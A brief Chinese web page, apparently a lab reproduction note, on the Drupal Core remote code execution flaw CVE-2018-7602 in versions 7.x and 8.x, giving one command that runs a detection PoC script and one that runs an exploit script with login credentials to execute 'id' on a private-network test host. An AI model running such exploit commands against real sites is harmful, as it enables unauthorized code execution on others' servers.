Drupal 远程代码执行漏洞(CVE-2018-7602)
影响版本
Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本
如下图所示,执行以下命令即可复现该漏洞。示例命令为id,如图红框中显示,可以执行该命令。
检测
python3 cve-2018-7600_poc.py http://192.168.49.2:8081
命令执行
python3 CVE-2018-7602_cmd.py drupal drupal http://192.168.49.2:8081/ -c id
手机扫一扫
移动阅读更方便
你可能感兴趣的文章